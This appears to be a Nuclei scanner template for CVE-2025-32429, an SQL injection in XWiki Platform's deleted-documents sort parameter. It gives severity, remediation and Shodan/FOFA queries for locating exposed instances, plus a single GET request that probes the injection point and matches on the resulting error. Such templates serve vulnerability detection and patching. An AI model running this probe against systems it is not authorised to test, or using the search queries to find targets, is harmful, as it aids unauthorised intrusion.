id: CVE-2025-32429 info: name: XWiki Platform - SQL Injection author: ritikchaddha severity: critical description: | XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In versions 9.4-rc-1 through 16.10.5 and 17.0.0-rc-1 through 17.2.2, it's possible for anyone to inject SQL using the parameter sort of the getdeleteddocuments.vm. It's injected as is as an ORDER BY value. impact: | Authenticated attackers with access to the deleted documents trash feature could inject SQL code, leading to data leakage, database modification, or further compromise of the application. remediation: | Upgrade to XWiki Platform version 16.10.6 and 17.3.0-rc-1. (or newer) which addresses this vulnerability. Always validate and sanitize user-controlled input for query parameters. reference: - https://jira.xwiki.org/browse/XWIKI-23093 - https://nvd.nist.gov/vuln/detail/CVE-2025-32429 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-32429 epss-score: 0.34913 epss-percentile: 0.97111 cwe-id: CWE-89 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: xwiki product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" tags: cve,cve2025,xwiki,hqli,sqli,vkev http: - method: GET path: - "{{BaseURL}}/xwiki/rest/liveData/sources/liveTable/entries?sourceParams.template=getdeleteddocuments.vm&sort=injected" matchers-condition: and matchers: - type: dsl dsl: - 'contains_all(body, "Exception", "org.xwiki.livedata.LiveDataException", "HqlQueryScriptService")' - 'contains(content_script_type, "text/javascript")' - 'status_code == 500' condition: and # digest: 4a0a00473045022056c8e501f55c89fb644d0b503c217d63f2ccd3a0c55b699f04b3c286fd7d806d022100cedbeb549b675d1feace37eda720c3d92f69cb4eab53717d23391372d108ecf9:922c64590222798bb761d5b6d8e72950